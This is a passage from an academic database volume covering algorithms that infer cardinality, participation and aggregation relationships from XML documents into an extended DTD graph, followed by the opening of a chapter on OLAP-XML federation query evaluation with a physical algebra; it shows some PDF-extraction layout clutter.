referring element name, the referred element name, and the linkage name, whereas the key for ElementNameCount is simply the element name. With three such tables, it is possible to derive the linkage attributes as shown in Table 4. The complete algorithm is presented in Figure 6, which is followed by a list of definitions for the variables to be used.
2497
Reverse Engineering from an XML Document into an Extended DTD Graph
Figure 4. A many-to-many cardinality implemented by an element type with two IDREF type attributes ... ...
Table 4. The attributes and their sources for determining data semantics Attribute MaxReferring MaxReferred SumReferring NumberElements
2498
Description The maximum number of referred elements referred by a single referring element The maximum number of referring elements that are referring to the same referred element with the same linkage type The number of referring elements that possess the linkage The number of referring elements in the document
Value Get from ReferringInfo with key (RGE, RDE, L) Get from ReferredInfo with key (RGE, RDE, L) Get from ReferringInfo with key (RGE, RDE, L) Get from ElementNameCount with key RGE
Reverse Engineering from an XML Document into an Extended DTD Graph
Figure 5. MaxReferring, MaxReferred, SumReferring, and NumberElements example message
MaxReferring= 1
message
ID1
ID2
ID1
ID3
ID2 IDREFs
ID4
ID5
ID4
ID6
ID5
NumberElements= 8 ID7
ID6
ID8
ID7
ID3
SumReferring = 7 MaxReferred = 3 ID8
Table 5. Descriptions of variables in reverse-engineering algorithms Attribute Name
Value
MaxReferring
1
MaxReferred
3
SumReferring
7
NumberElements
8
Explanations All linkages are implicit and each child element has one implicit parent element only. The root message element with attribute ID value ID1 is referred by two subelements (with attribute ID values ID2 and ID6). The message element with attribute ID value ID2 is referred by three subelements (with attribute ID values ID3, ID4, and ID5). The message element with attribute ID value ID6 is referred by two subelements (with attribute ID values ID7 and ID8). Therefore, the value of MND is 3. Except the root message element with attribute ID value ID1, all other message elements define such linkages. The value of NL is therefore 7. There are eight message elements.
Table 6. Matrix for determining cardinality and participation based on the determined linkage attributes
One to one One to many Cardinality Many to one Many to many
Reverse Engineering from an XML Document into an Extended DTD Graph
The operation in Figure 6 can be represented by the following in SQL (structured query language): SELECT RGE, RDE, L, ReferringInfo.MaxReferring, ReferredInfo.MaxReferred, ReferringInfo.SumReferring, ElementNameCount.NumberElements FROM ReferringInfo INNER JOIN ReferredInfo ON ReferringInfo.RGE = ReferredInfo. RGE AND ReferringInfo.RDE = ReferredInfo. RDE AND ReferringInfo.L = ReferredInfo.L INNER JOIN ElementNameCount ON ReferringInfo.RGE = ElementNameCount.E.
Once the four attributes of a linkage are determined, the data semantics can be determined by using the matrix shown in Table 6. According to the determined one-to-one and one-to-many relationships, it is then possible to consolidate the related ones into many-to-many and n-ary relationships. As mentioned above, if an XML element type defines two linkages that are determined to be many-to-one cardinalities, the two referred XML element types are considered to be in a many-to-many relationship. Similarly, if an XML element type defines more than two linkages that are determined to be many-to-one cardinalities, the referred XML element types are considered to be in an n-ary relationship. Therefore, based on the one-to-many cardinalities determined by the previous algorithm, the many-to-many and n-ary relationships can be determined, and the algorithm is shown in Figure 7.
Figure 6. The algorithm for determining linkage information by traversing the XML document Variable name EID E A AV L
Lvalue NG RGE RDE
Definition The current element ID. While processing the XML document sequentially, the EID determines the ID to be assigned to individual element encountered. The current element to be handled. An attribute of the current element to be handled. The attribute value of attribute A. A linkage of the current element. It can be an implicit linkage with its parent element or an explicit linkage with an IDREF(S) type attribute. For a non-root element without IDREF(S) attribute, the element has only one implicit linkage to its parent element. Otherwise, the element can have more than one linkage, one implicit linkage and at least one explicit linkages. The Element ID of the linkage L for the current element E. For example, if L is an implicit linkage, Lvalue is the element ID of the parent element of E. Otherwise, Lvalue is the attribute value of IDREF value and the value should be an ID type attribute of an element in the same document. The number of referring element of the same element name is referring to the same referred element with the same link. The referring element of a link. The referred element by a link. continued on following page
2500
Reverse Engineering from an XML Document into an Extended DTD Graph
Figure 6. continued Pass One: Let EID = 1; Repeat until all XML document elements are read Let E be the current element to be processed If ∃ record in TableElementNameCount where ElementName = element name of E Get record (ElementName, NumberElement) from TableElementNameCount Increment NumberElement by 1; Update (ElementName, NumberElement) into TableElementNameCount; Else Add (ElementName, 1) into SetElementNameCount; End If Add (EID, ElementName) into SetElementIDName; If there exists ID type attribute A of element E with attribute value AV Add (AV, ElementName) into SetElementIDName; End If Increment EID by 1; Navigate to the next element E in the XML document Pass Two: Repeat until all XML document elements are read Let RGE is the current element to be handled For each linkage, L, of RGE For each linkage value, Lvalue of linkage L of RGE Get record (EID,ElementName) from TableElementIDName where primary key value is Lvalue If no such record exist in TableElementIDName XML document is invalid Else Let RDE = ElementName of the record obtained from TableElementIDName End If Get record (RGE, RDE, L, Lvalue, ND) from TableRawReferredInfo for primary key (RGE, RDE, L, Lvalue); If record exists Increment ND of the record by 1; Update the record to TableRawReferredInfo; Else Add record (RGE, RDE, L, Lvalue, 1) to the TableRawReferredInfo; End If For each referred element type, RDE Let NG = number of RDE referred by this linkage, L; Get record (RGE, RDE, L,MaxReferring, SumReferring) from the TableReferringInfo for primary key (RGE, RDE, L); If record exists If NG > MaxReferring from the record Update MaxReferring of the record to be NG End If Increment SumReferring of the record by 1; Upda te the record to the TableReferringInfo; Else Add record (RGE, RDE, L, NG, 1) to the TableReferringInfo; End If End For End For End For Navigator to the next element RGE in the XML document Consolidate the records with same combination of (RGE, RDE, L) in table RawReferredInfo; let MaxReferred = maximum of the ND values of all records; Add record (RGE, RDE, L, MaxReferred) to the table ReferredInfo;
2501
Reverse Engineering from an XML Document into an Extended DTD Graph
Figure 7. The algorithm for determining many-to-many and n-ary relationships Get referring XML element types from one-to-many cardinalities; For each referring XML element Treferring type Get referred XML element types, Sreferred referred by Treferring via explicit linkages; If the size of the set Sreferred = 2 XML element types in Sreferred = many-to-many relationship with Treferring; Else If size of Sreferred > 2 XML element types in Sreferred = n-ary relationship with Treferring ;
The many-to-one relationship to be considered should be those implemented by explicit linkages, that is, those defined by ID/IDREF(S) linkages. Otherwise, an element type exhibits implicitly a one-to-many relationship due to the nested structure and defines a many-to-one relationship that will be considered to be a many-to-many relationship even though the two referred elements are actually not related at all.
Participation Participation concerns whether all instances of a particular element type are involved in a relationship with the corresponding element type. For implicit referential linkage by a parentchild relation, such as the following DTD ELEMENT declaration, ,
where there are no other ELEMENT declarations that define CHILD as their child elements, all CHILD element instances must appear as the child element of a PARENT element, and hence the participation can be considered to be total as all instances of CHILD must be involved in the one-to-many cardinality relation with PARENT. If no schema is provided, and if all instances of an element type always appear as the child elements of the same parent element type, the participation is also considered to be total.
2502
For explicit referential linkage by ID/IDREF(S) attributes, if all instances of an element type use the same attribute with values referring instances of the same element type, the relationship is considered to be total participation. Otherwise, the relation is considered to be partial. The DTD of the XML document can only identify the ID/ IDREF(S) type attributes and cannot restrict the referring and referred element types. As such, actually parsing the XML document is required to determine the type of participation.
Aggregation An aggregation means that the creation of a whole part of an element depends on the existence of its component subelements. An aggregation relation is signified by the scenario that elements of different types are considered to be a single entity and all constituting elements must exist together. An XML document by itself does not provide any facility to enforce such a constraint. At best, the schema can hint at the correlations of the existence of the elements in the corresponding XML document. Implicit referential linkage by an aggregation relationship is shown in the following DTD ELEMENT declaration: .
Reverse Engineering from an XML Document into an Extended DTD Graph
For example, the following ELEMENT declaration can restrict the existence of the elements enrollment, student, and course: .
Furthermore, no student or course elements exist in the document that are not subelements of an enrollment element. For example, if there is another ELEMENT declaration in the same DTD, such as ,
elements can exist in the document as the subelements of a student _ list element. As student
such, the coexistence relationship of enrollment, student, and course elements no longer holds. Such a coexistence relationship specified in the schema can be extended to more than one nested level. For example, if the existence of a course element must be accompanied by a lecturer element and a tutor element, that is, ,
then the elements enrollment, student, course, lecturer, and tutor must exist as a whole. All these elements are considered as being in an aggregation relationship. From another perspective, an aggregation relationship is actually composed of two one-to-one cardinality relations (course-
Figure 8. The algorithm for determining aggregation relationships Let Settemporary = empty; For each ELEMENT declaration for element Eparent For each child element, elementchild If elementchild = mandatory and non-repeatable Add an aggregation relation (Eparent, Echild) to Settemporary; Let Setaggregation and Setroot = empty; For each relation R (Eparent, Echild) in Settemporary If (∃ tree, T, in Setaggregation) (Eparent is a node in T) (Echild is not a node in T) Add a path Eparent to Echild to T; Else (∃ tree, T, in Setaggregation) (Echild is a node of T) (Eparent is not a node) If (Echild = root node) (Echild not in Setroot of T) A dd the path Eparent to Echild to T; Else Add Echildto Setroot Remove the sub-tree starting with Echild from T; If ∃ sub-tree starting with Echild in multiple nodes Add sub-tree to Setaggregation; Else ∃ tree Ti with a node for Eparent and Tj with Echild as root node; Merge trees Ti and Tj with a path from node for Eparent in Ti to root of Tj Else ¬∃ sub-tree in Setaggregation with node for either Eparent and Echild; Add a new tree with a path Eparent to Echild to Setaggregation;
2503
Reverse Engineering from an XML Document into an Extended DTD Graph
and course-tutor) that are both total participation. An exceptional case is if the subelements are actually the attribute of the parent element, such as in the first example, where it is inappropriate to consider that the involved elements are in an aggregation relationship. As a result, user supervision is needed in the process. Based on the DTD of the XML document, it is possible to determine the aggregation relationships from the elements. As the requirements of an aggregation relationship are the coexistence of the involved elements and the insignificance of the order of the subelements for a parent element, the nested structure of the elements should first be simplified with the algorithm presented in Figure 8, where T is an aggregation tree. The determination of aggregation relationships is separated into two parts. The first part discovers the pair of parent and child elements that must coexist. Once the pairs are determined, the second part of the algorithm treats each pair as a path from the parent element to the child element in a subtree, and these subtrees are merged to form a bigger tree. Eventually, the nodes in each tree must coexist in an aggregation relationship. The second part is straightforward except for a tricky point: If a child element is found to be a nonroot node of a particular subtree, it implies that such an element can have more than one parent element, and the aggregation relation that includes such element must start with the parent element. An example is this list of ELEMENT declarations in the DTD:
lecturer
.
The determined pairs of raw aggregation relations are (A, B), (A, C), (B, D), (C, D), (D, E), and (D, F).
2504
A
B
Relations to be added C
(C, D), (D, E) and (D, F)
D
When adding the path (C, D) to the subtree, as D is not a root node, D should be removed from the subtree and is considered to be an individual subtree with D as the single node. A
D
Relations to be added B
C
(D, E) and (D, F)
After the path (D, E) and (D, F) is added to the subtree with node D as the root node, two subtrees are obtained. A
B
D
C
E
F
As such, the elements A, B, and C and the elements D, E, and F are considered as being two individual aggregation relationships.
CASE STUDY AND PROTOTYPE To illustrate the applicability and correctness of the algorithms mentioned in this article, a prototype was built that implements the algorithms proposed. For actually drawing the DTD graph, the algorithm proposed by Shiren, Xiujun, Zhongshi, and Bing (2001) is used to define the layout of the vertexes on the graph. With such a prototype, a sample XML document with its DTD file as shown in Figure 9 is provided for the prototype.
Reverse Engineering from an XML Document into an Extended DTD Graph
Figure 9. test.xml and test.dtd
For this case study, both ID/IDREF type attributes are considered and the minimum number of common attributes is one. All elements with at least one attribute are sorted in ascending order of the lengths of their attribute lists. Therefore, the order of the elements to be processed is element1, element2, and element3. According to the DTD of the XML document, only one ELEMENT declaration is used for constructing the extended DTD graph as the contents of other element types are EMPTY.
Therefore, only those explicit one-to-many relationships are to be added to the graph, and
the graph will become the one shown in Figures 10 and 11. The detailed derivation of the reverse engineering can be referred to in Shiu (2006).
CONCLUSION In order to make use of an XML document, software developers and end users must have a thorough understanding of the contents in the document, especially in historical and large XML documents. Sometimes, the schemas of XML documents are missing and the documents cannot be opened to be inspected on the screen due to their huge size. Therefore, it is necessary to determine as much information as possible
2505
Reverse Engineering from an XML Document into an Extended DTD Graph
regarding the relationships from the elements in the document. By reverse engineering the XML document with DTD, all explicit linkages can be determined, and the resultant DTD graph can be used to verify the correctness of ID/IDREF(S) linkages as any incorrect IDREF(S) linkage will be indicated as an extra cardinality and shown in the extended DTD graph. This article provides algorithms to help the users to understand the relationships
from the elements by reverse engineering data semantics from the XML document, including the following. 1. 2. 3. 4. 5.
Cardinality relationships Participation relationships n-ary relationships Aggregation relationships Many-to-many relationships (a special case of cardinality relationships)
Figure 10. The determined data semantics
Figure 11. Extended DTD graph based on the DTD and the determined cardinality references
2506
Reverse Engineering from an XML Document into an Extended DTD Graph
In summary, to visualize the determined data semantics, a new extended DTD graph is proposed. XML documents natively support one-to-one, one-to-many, and participation data semantics. With a corresponding schema such as DTD, the ID and IDREFS attributes of the elements can be identified, and many-to-many, n-ary, and aggregation relationships can also be determined.
ACKNOWLEDGMENT This article is funded by Strategic Research Grant No. 7002325 of City University of Hong Kong.
REFERENCES An, Y., Borgida, A., & Mylopoulos, J. (2005). Constructing complex semantic mappings between XML data and ontologies. In International Semantic Web Conference ISWC 2005 (pp. 6-20). Booch, G., Christerson, M., Fuchs, M., & Koistinen, J. (1999). UML for XML schema mapping specification. Retrieved from http://xml.coverpages.org/fuchs-uml_xmlschema33.pdf Bosak, J., Bray, T., Connolly, D., Maler, E., Nicol, G., Sperberg-McQueen, C. M., et al. (1998). Guide to the W3C XML specification (XMLspec) DTD, version 2.1. Retrieved from http://www.w3.org/ XML/1998/06/xmlspec-report-v21.htm Böttcher, S., & Steinmetz, R. (2003). A DTD graph based XPath query subsumption test. In Xsym 2003 (pp. 85-99). Bray, T., Paoli, J., Sperberg-McQueen, C. M., Maler, E., & Yergeau, F. (2004). Extensible markup language (XML) 1.0 (3rd ed.). Retrieved from http:// www.w3.org/TR/2004/REC-xml-20040204 Chidlovskii, B. (2001). Schema extraction from XML data: A grammatical inference approach. In
KRDB’01 Workshop (Knowledge Representation and Databases). Deutsch, A., Fernandez, M., & Suciu, D. (1999). Storing semi-structured data with STORED. Paper presented at the SIGMOD Conference, Philadelphia. Fernandez, M., Morishima, A., & Suciu, D. (2001). Publishing relational data in XML: The SilkRoute approach. IEEE Data Engineering Bulletin, 24(2), 12-19. Florescu, D., & Kossmann, D. (1999). Storing and querying XML data using an RDBMS. Bulletin of the Technical Committee on Data Engineering, 22(3), 27-34. Fong, J., & Cheung, S. K. (2005). Translating relational schema into XML schema definition with data semantic preservation and XSD graph. Information and Software Technology, 47(7), 437-462. Fong, J., & Wong, H. K. (2004). XTOPO: An XML-based technology for information highway on the Internet. Journal of Database Management, 15(3), 18-44. Funderburk, J. E., Kiernan, G., Shanmugasundaram, J., Shekita, E., & Wei, C. (2002). XTABLES: Bridging relational technology and XML. IBM Systems Journal, 41(4). Goldman, R., & Widom, J. (1997). DataGuides: Enabling query formulation and optimization in semistructured databases. In Proceedings of the 23rd International Conference on Very Large Data Bases. Kanne, C. C., & Moerkotte, G. (2000). Efficient storage of XML data. In Proceedings of ICDE (p. 198). Kay, M. (1999). DTDGenerator: A tool to generate XML DTDs. Retrieved from http://users.breathe. com/mhkay/saxon/dtdgen.html
2507
Reverse Engineering from an XML Document into an Extended DTD Graph
Klettke, M., Schneider, L., & Heuer, A. (2002). Metrics for XML document collections. In A. Chaudri & R. Unland (Eds.), XMLDM Workshop, Prague, Czech Republic (pp. 162-176).
Sahuguet, A. (2000). Everything you ever wanted to know about DTDs, but were afraid to ask. In WebDB-2000.
Koike, Y. (2001). A conversion tool from DTD to XML schema. Retrieved from http://www. w3.org/2000/04/schema_hack
Shanmugasundaram, J., Shekita, E., Kiernan, J., Krishnamurthy, R., Viglas, E., Naughton, J., et al. (2008). Schematron. Retrieved from http://www. schematron.com
Lee, D. W., & Chu, W. W. (2000a). Comparative analysis of six XML schema languages. SIGMOD Records, 29(3).
Shiren, Y., Xiujun, G., Zhongzhi, S., & Bing, W. (2001). Tree’s drawing algorithm and visualizing method. In CAD/Graphics’2001.
Lee, D. W., & Chu, W. W. (2000b). Constraintspreserving transformation from {XML} document type definition to relational schema. In International Conference on Conceptual Modeling: The Entity Relationship Approach (pp 323-338).
Shiu, H. (2006). Reverse engineering data semantics from arbitrary XML document. Unpublished master’s thesis, City University of Hong Kong, Hong Kong, China.
Lee, D. W., Mani, M., & Chu, W. W. (2003). Schema conversion methods between XML and relational models. In Knowledge Transformation for the Semantic Web. Lu, S., Sun, Y., Atay, M., & Fotouhi, F. (2003). A new inlining algorithm for mapping XML DTDs to relational schemas. In Proceedings of the First International Workshop on XML Schema and Data Management, in conjunction with the 22nd ACM International Conference on Conceptual Modeling (ER2003). Mello, R., & Heuser, C. (2001). A rule-based conversion of a {DTD} to a conceptual schema. In Lecture notes in computer science (Vol. 2224). Min, J. K., Ahn, J. Y., & Chung, C. W. (2003). Efficient extraction of schemas for XML documents. Information Processing Letters, 85(1). Moh, C., Lim, E., & Ng, W. (2000). DTD-Miner: A tool for mining DTD from XML documents. In Proceedings of the Second International Workshop on Advanced Issues of E-Commerce. RELAX NG. (2003). Retrieved from http://www. relaxng.org
2508
Sperberg-McQueen, C., & Thompson, H. (2000). W3C XML schema. Retrieved from http://www. w3.org/XML/Schema Stayton, B. (2008). DocBook. Retrieved from http://www.docbook.org Tatarinov, I. (2001). A general technique for querying XML documents using a relational database system. SIGMOD Record, 30(3), 261-270. Thiran, P. H., Estiévenart, F., Hainaut, J. L., & Houben, G. J. (2004). Exporting databases in XML: A conceptual and generic approach. In Proceedings of CAiSE Workshops (WISM’04). Trujillo, J., & Luján-Mora, S. (2004). Applying UML and XML for designing and interchanging information for data warehouses and OLAP applications. Journal of Database Management, 15(1), 41-72. World Wide Web Consortium (W3C). (1998). Schema for object-oriented XML. Retrieved from http://www.w3.org/TR/1998/NOTE-SOX19980930 World Wide Web Consortium (W3C). (2003). Document object model DOM. Retrieved from http://www.w3.org/DOM
Reverse Engineering from an XML Document into an Extended DTD Graph
World Wide Web Consortium (W3C). (2004). Simple API for XML, SAX. Retrieved from http:// www.saxproject.org Zhang, J., Liu, H., Ling, T., Bruckner, R., & Tija, A. (2006). A framework for efficient association
rule mining in XML data. Journal of Database Management, 17(3), 19-40. Zhao, L., & Siau, K. (2007). Information mediation using metamodels: An approach using XML and common warehouse metamodel. Journal of Database Management, 18(3), 69-82.
This work was previously published in the Journal of Database Management, edited by K. Siau, Volume 19, Issue 4, pp. 62-80, copyright 2008 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
2509
2510
Chapter 8.8
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra Xuepeng Yin Aalborg University, Denmark Torben Bach Pedersen Aalborg University, Denmark
ABSTRACT
INTRODUCTION
In today’s OLAP systems, physically integrating fast-changing data (e.g., stock quotes) into a cube is complex and time-consuming. The data is likely to be available in XML format on the World Wide Web (WWW); thus, instead of physical integration, making XML data logically federated with OLAP systems is desirable. In this article, we extend previous work on the logical federation of OLAP and XML data sources by presenting simplified query semantics, a physical query algebra, and a robust OLAP-XML query engine, as well as the query evaluation techniques. Performance experiments with a prototypical implementation suggest that the performance for OLAP-XML federations is comparable to queries on physically integrated data.
Online Analytical Processing (OLAP) technology enables data warehouses to be used effectively for online analysis, providing rapid responses to iterative complex analytical queries. Usually an OLAP system contains a large amount of data, but dynamic data (e.g., stock prices) is not handled well in current OLAP systems. To an OLAP system, a well-designed dimensional hierarchy and a large quantity of pre-aggregated data are the keys. However, trying to maintain these two factors when integrating fast-changing data physically into a cube is complex and timeconsuming, or even impossible. However, the advent of XML makes it very possible that the data is available in XML format on the WWW; thus, making XML data accessible to OLAP systems is greatly needed.
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
Our overall solution is to logically federate the OLAP and XML data sources. This approach decorates the OLAP cube with virtual dimensions, allowing selections and aggregations to be performed over the decorated cube. In this article, we describe the foundation of a robust federation query engine with the focus on query evaluation, which includes the query semantics, a physical algebra, and query evaluation techniques. First, a query semantics that simplifies earlier definitions (Pedersen, Riis, & Pedersen, 2002) is proposed. Here, redundant and repeated logical operators are removed, and a concise and compact logical query plan can be generated after a federation query is analyzed. Second, a physical query algebra, unlike the previous logical algebra, is able to model the real execution tasks of a federation query. Here, all concrete data retrieval and manipulation operations in the federation are integrated. This means that we obtain a much more precise foundation for performing query optimization and cost estimation. Third, the detailed description of the query evaluation introduces how the modeled execution tasks of a query plan are performed, including the concrete evaluation algorithms and techniques for each physical operator and the general algorithm that organizes and integrates the execution of the operators in a whole plan. In addition, algebrabased query optimization techniques, including the architecture of the optimizer, cost estimation of physical operators, and plans, also are presented. Experiments with the query engine suggest that the query performance of the federation approach is comparable to physical integration. There has been a great deal of previous work on data integration; for instance, on relational data (Hellerstein, Stonebraker, & Caccia, 1999; IBM, n.d.; Oracle, 2005), semi-structured data (Chawathe et al., 1994; Nicolle, Yétongnon, & Simon, 2003), a combination of relational and semi-structured data (Goldman & Widom, 2000; Lahiri, Abiteboul, & Widom, 1999), a combination of object-oriented and semi-structured data (Bae, Kim, & Huh, 2003), and an integration of remote
data warehouses by hypermaterialized views (Triantafillakis, Kanellis, & Martakos, 2004). However, none of these handles the advanced issues related to OLAP systems (e.g., automatic and correct aggregation and dimensions with hierarchies). Some work concerns integrating OLAP and object databases (Gu, Pedersen, & Shoshani, 2000; Pedersen, Shoshani, Gu & Jensen, 2000), which demands rigid schemas (i.e., data is represented by classes and connected by complex associations). In comparison, using XML as data source, as we do, enables the federation to be applied on any data as long as the data allows XML wrapping, greatly enlarging the applicability. Our pervious work (Pedersen et al., 2002) presents a logical federation of OLAP and XML systems, where a logical algebra defines the query semantics and a partial straightforward implementation. In comparison, this article takes a further step and introduces a physical query algebra, and the query evaluation and optimization techniques are implemented in a robust OLAP-XML federation query engine. This article makes the following novel contributions, which are extensions to the most related work (Yin & Pedersen, 2004). First, a robust OLAP-XML federation query engine is presented along with its GUI. Second, query evaluation is described in detail. Here, the evaluation of the physical operators, including component data retrieval, component query construction, and optimization of constructed queries, is presented. In addition, an example is given to show the query evaluation process step-by-step. Third, we also show the cost estimation algorithm of physical plans and how the costs of the physical operators are approximated. The article is organized as follows. We first introduce an example cube and XML document used in the illustrations. Then, an overview of the overall architecture of the federation and the federation query language is given. We define the formal representation of the federation and the federation queries using the logical algebra.
2511
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
The physical algebra then is introduced, which includes the definitions of the physical operators and examples. In the following sections, we present the query evaluation and optimization techniques, including algorithms, component query construction, and examples. The experiments in performance study compare the performance between the logical and physical federations, whereas the last section offers conclusions about the current OLAP-XML federation and indicates future work that extends the query optimization and evaluation techniques.
CASE STUDY The TPC-H-based (Transaction Processing Performance Council, 2004) database used in the experiments and illustrations is shown in Figure 1. The OLAP database, called TC, is characterized by a Supplier dimension, a Parts dimension, an Order dimension, and a Time dimension. For each line item, Quantity and ExtendedPrice are measured. An example fact table is shown in Table 1. The XML document is composed of the nation codes and public population data about nations in
Figure 1. Cube schema
Figure 2. Part of the XML data
Table 1. The fact table Quantity
2512
ExtPrice
Supplier
Part
Order
Day
17 36 28
17954 73638 29983
S1 S2 S2
P3 P5 P4
11 18 42
2/12/1996 5/2/1992 30/3/1994
2 26
2388 26374
S3 S4
P3 P2
4 20
8/12/1996 10/11/1993
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
millions. An example of the document is illustrated in Figure 2, where each Nation element contains two subelements: NationName and Population. We use the listed three lines as the example data in this article. To connect the dimension values of the level Nation and the populations, a link, Nlink, is defined, which maps dimension values for Nation in the cube to the nodes Nation in the XML document. The next section uses the example cube and XML document to illustrate the federation query language.
FEDERATION OVERVIEW In this section, we give an overview of the prototypical OLAP-XML federation system, the federation query language, and the basic query evaluation process. The overall architecture of the federation system is shown in Figure 5. Besides the OLAP and the XML components, three auxiliary components have been introduced to hold metadata, link data, and temporary data. Queries are posed to the query engine, which coordinates the execution of queries in the components. In the prototype, MS SQL Server 2000 Enterprise Edition with SP3 is used. More specifically, the
Figure 3. The GUI of the federation query engine
temporary component is the temporary database on SQL Server, and the OLAP component uses MS Analysis Services (AS) and is queried with SQL (Microsoft, 2005b). The XML component is the local file system based on the XML data retrieved from the Web with MS OPENXML (Microsoft, 2002b) on top. Figure 3 shows a screen shot of the prototypical query engine. The prototype was programmed in MS Visual J++ 6.0 with Component Object Model (COM) interfaces (Microsoft, 2005a) to take advantage of the existing relational, multidimensional database and XML technologies from Microsoft. Using the query engine, users can pose queries in the query tab and execute the query by pressing the button with a red flash. The query plan tab in the middle shows the execution plan of the posed query. To its right is the query result tab, where the result data is shown in table format. Messages indicating the processing progress of the posed query are shown in the bottom text box. The current prototype does not have a sophisticated interface and is used only for experimental purposes. The core techniques will be integrated later with the business analysis products of a Danish Business Intelligence (BI) tool vendor, TARGIT (Pedersen, Pedersen, & Pedersen, 2004). The federation query language is called XMLextended Multidimensional SQL (SQLXM), which has basic clauses similar to SQL (i.e., SELECT, FROM, WHERE, GROUP BY, and HAVING) and uses level expressions (defined later) for referencing external XML data. Figure 4 is an example SQLXM query based on the cube in Figure 1, where the roll-up expression Brand(Part) rolls up to the Brand level from the Part level, and the level expression Nation[ANY]/Nlink/Population connects the dimension level Nation and the decoration XML data Population with a link, Nlink. As shown in Figure 5, the query engine has three components: query analyzer, query optimizer, and query evaluator. The query engine parses and analyzes the given query, and generates the initial logical plan. The plan is expressed in the
2513
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
Figure 4. An example SQLXM query SELECT FROM WHERE GROUP BY
Figure 5. Architecture of the OLAP-XML federation system
logical algebra. The query optimizer generates a plan space for the initial plan, where all the logical plans produce the same output as the original one. Furthermore, the optimizer converts all the logical plans into physical plans by converting the logical operators into physical operators. Then, costs of the plans can be estimated. Finally, the optimizer searches for the best execution plan that has the least evaluation time and passes the plan on to the query evaluator. The evaluator executes
2514
the operators in the given plan and generates the final result. Generally, the component queries are evaluated in the OLAP and XML components in parallel, and the results of these queries are transferred to the temporary component for further processing. Sometimes, the selection predicates on level expressions can be rewritten to new predicates with only references to dimension values and constants, therefore can be evaluated in the OLAP component. We term this technique inlining. Therefore, in such a situation, some XML queries have to be evaluated before the construction of OLAP queries in order to rewrite the predicates. Moreover, the underlying OLAP cube may be sliced and aggregated, which leads to less intercomponent data transfer. There are also physical operators in the execution plan that model the processing of the temporary data in the temporary component, where SQL operations are used to process the gathered data. Finally, the final result is produced in a temporary table. The next section formalizes the terms introduced informally in this section.
DATA MODELS The cube model is defined in terms of a multidimensional cube consisting of a cube name, dimensions, and a fact table. Each dimension comprises two partially ordered sets (posets)
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
representing hierarchies of levels and the ordering of dimension values. Each level is associated with a set of dimension values. That is, a dimension Di is a two-tuple (LDi, EDi), where LDi is a poset of levels and EDi is a poset of dimension values. LDi is the four-tuple (LSi, i, i, i), where LSi= {li1, ..., lik} is a set of levels, lij(1 ≤ j ≤ k) is a level name, and i is a partial order on these levels. is the bottom level, while i is the unique ALL i level. We shall use lij ∈ Di as a shorthand meaning that the level lij belongs to the poset of levels in dimension Di. The partial order of levels is the containment-ship between two levels in the same dimension (i.e., li1 i li2 holds if elements in Li2 can be said to contain the elements in Li1). Here, Lik is the set of dimension values of level lik, which is Lik = {eik1, ..., eiklik}. Similarly, we say that e1 Di e2 if e1 is logically contained in e2 and lij i lik for e1 ∈ Lij and e2 ∈ Lik. For example, we say 01.21.2000 DTime 2000, because the day 01.21.2000 is contained in the year 2000. EDi is a poset ( j Lij, Di) consisting of the set of all dimension values in the dimension and a partial ordering defined on these. For each level l, we assume a function Roll-upl: L × LSi P(Di), which, given a dimension value in L and a level in LSi returns the value’s ancestor in the level; that is, Roll-upl(eikh, lij) = {e′ ⏐ eikh Di e′ ∧ e′ ∈ Lij}. A roll-up expression lij(lik) uses the Roll-up function to aggregate the cube from a lower level lik to a higher level lij, that is lik i lij ∧ lik ≠ lij. A fact table F is a relation containing one attribute for each dimension and one attribute for each measure. Thus, F = {(e 1, ..., e n, v1, ..., vm) ⏐(e 1, ..., e n) ∈ 1 ×...× n ∧ (v1, ...,vm) ∈ M ⊆ T1 ×...× Tm}, where n ≥ 1, m ≥ 1 and Tj is the domain value for the jth measure. We also will refer to the jth measure as Mj = {(e 1, ..., e n, vj)}. Each measure Mj is associated with a default aggregate function f j: P(Tj) Tj, where the input is a multiset. Aggregate functions ignore NULL values as in SQL. There may be NULL values for measures in the logical definition, but in a physical implementation, only the non-empty tuples would be
stored in the fact table. An n-dimensional cube, C, is given as: C = (N, D, F), where N is the cube name, D = {D1, ..., Dn} is a set of dimensions, and F is the fact table. A federation is the data structure on which we perform logical federation operations (e.g., selections, aggregations, and decorations). A federation F is a three-tuple: F = (C, Links, X), where C is an OLAP cube, X is the referred XML documents, and Links is a set of links (see the following) between levels in C and documents in X. A link is a relation that connects dimension values with nodes in XML documents. For example, a link Nlink = {(DK, n1), (CN, n2), (UK, n3)} maps each dimension value to a node in the example XML document. Here, n1 is the Nation node with the subnode NationName having the string value DK; n2 is the Nation node with the subnode NationName having the string value CN; and similarly for n3. An XPath expression (Clark & DeRose, 2005) is a path that selects a set of nodes in an XML document. To allow references to XML data in SQLXM queries, links are used with XPath expressions to define level expressions. A level expression l[SEM]/link/xp consists of a starting level l, a decoration semantic modifier SEM, a link link from l to nodes in one or more XML documents, and a relative XPath expression xp which is applied to these nodes to identify new nodes. For example, Nation[ANY]/Nlink/Population links the dimension value DK with its population data 5.3 (million), which is the string value of the node Population in the context of n1. SEM represents the decoration semantics, ALL, ANY, and CONCAT, which specify how many decoration values should be used when several of them are found for a dimension value through link and xp. The ALL semantics connect each dimension value with all of the linked decoration values, and the ANY semantics just use an arbitrary decoration value for each dimension value, whereas the CONCAT semantics concatenate all the possible decoration values into one.
2515
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
A hierarchy is strict if no dimension value has more than one parent value from the same level (Lenz & Shoshani, 1997). Non-strict hierarchy can lead to incorrect aggregation over a dimension (e.g., some lower-level values will be doublecounted). Three types of data are distinguished: c, data that may not be aggregated because fact data is duplicated and may cause incorrect aggregation; α, data that may be averaged but not added; and Σ, data that also may be added. A function AggType: {M1, ..., Mm} × D {Σ, α, c} returns the aggregation type of a measure Mj when aggregated in a dimension Di ∈ D. Considering only the standard SQL functions, we have that Σ = {SUM, AVG, MAX, MIN, COUNT}, α = {AVG, MAX, MIN, COUNT}, c = ∅. The next section presents the representations of federation queries in terms of logical operators using the symbols already defined.
